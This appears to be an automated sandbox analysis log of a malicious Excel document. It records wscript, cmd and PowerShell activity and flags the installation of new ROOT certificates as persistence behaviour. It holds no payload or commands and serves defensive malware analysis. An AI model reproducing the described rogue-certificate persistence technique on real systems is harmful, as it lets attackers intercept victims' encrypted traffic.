Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: dwmapi.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: winbrand.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rpcrtremote.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: webio.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: credssp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: winbrand.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: winbrand.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: winbrand.dll

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C62A69F0-16DC-11CE-9E98-00AA00574A4F}\InprocServer32

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Window found: window name: SysTabControl32

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	Automated click: OK
Source: C:\Windows\SysWOW64\rundll32.exe	Automated click: OK
Source: C:\Windows\SysWOW64\rundll32.exe	Automated click: OK

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:	Binary string: .pdbdb source: powershell.exe, 00000005.00000002.477610402.00000000004B2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: .pdbdb,, r source: powershell.exe, 00000009.00000002.515482549.000000001A656000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: .pdbdb: source: powershell.exe, 0000000D.00000002.520619942.000000001AC54000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.pdb source: powershell.exe, 0000000D.00000002.520619942.000000001AC90000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.520619942.000000001AD15000.00000004.00000020.00020000.00000000.sdmp

Source: ~DF37CAD9B92CF722FF.TMP.0.dr

Initial sample: OLE indicators vbamacros = False

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_000007FE8B66022D push eax; iretd	5_2_000007FE8B660241
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_000007FE8B6600BD pushad ; iretd	5_2_000007FE8B6600C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_000007FE8B6600CD pushad ; iretd	5_2_000007FE8B6600C1

Persistence and Installation Behavior

Installs new ROOT certificates

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C Blob	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C Blob	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
